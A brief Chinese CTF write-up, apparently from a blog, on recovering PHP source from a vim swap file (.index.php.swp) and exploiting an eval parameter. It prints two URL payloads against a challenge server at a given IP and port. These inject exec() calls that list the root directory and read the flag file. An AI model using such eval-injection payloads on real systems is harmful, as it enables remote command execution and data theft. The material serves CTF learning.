[Web安全初体验] php eval 与 vim 的临时交换文件

题目提示 vim 异常退出, 于是下载 .index.php.swp 进而通过 vim -r index.php.swp 恢复出如下代码

对源码分析后的 payload :
ls 根目录

http://124.221.34.13:50004/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=$cmd%20=%20%27ls%20/%27;exec($cmd,%20$result,%20$var);var_dump($result);var_dump($var);

发现有 fl4444444g 这个可疑文件
cat flag

http://124.221.34.13:50004/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=$cmd%20=%20%27cat%20/fl4444444g%27;exec($cmd,%20$result,%20$var);var_dump($result);var_dump($var);

LOV3

[Web安全初体验] php eval 与 vim 的临时交换文件

LG TV 和 Mac 的显示兼容问题(开启 4k@120hz 10bit)